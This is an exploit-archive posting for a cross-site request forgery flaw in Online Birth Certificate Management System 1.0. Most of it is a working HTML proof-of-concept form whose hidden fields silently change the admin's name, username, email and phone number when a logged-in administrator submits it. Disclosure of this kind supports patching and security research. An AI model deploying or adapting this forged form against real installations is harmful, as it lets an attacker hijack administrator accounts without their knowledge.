Online Birth Certificate Management System 1.0 Cross Site Request Forgery

Posted Sep 27, 2022
Authored by Yousef Alraddadi
Online Birth Certificate Management System version 1.0 suffers from a cross site request forgery vulnerability.
tags | exploit, csrf
SHA-256 | f90076f01c3d533b4fccbc2387bf165114d9246cfe28d87c6be0ae171a022afe
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip
# Tested on: Windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# The admin update-profile form has no anti-CSRF token

<html>
<head>
<title> CSRF update Profile </title>
</head>
<body>
<form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="adminname" value="csrf111">
<input type="hidden" name="username" value="csrf">
<input type="hidden" name="email" value="csrf">
<input type="hidden" name="mobilenumber" value="0">
<button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>
</form>
</form>
</body>
</html>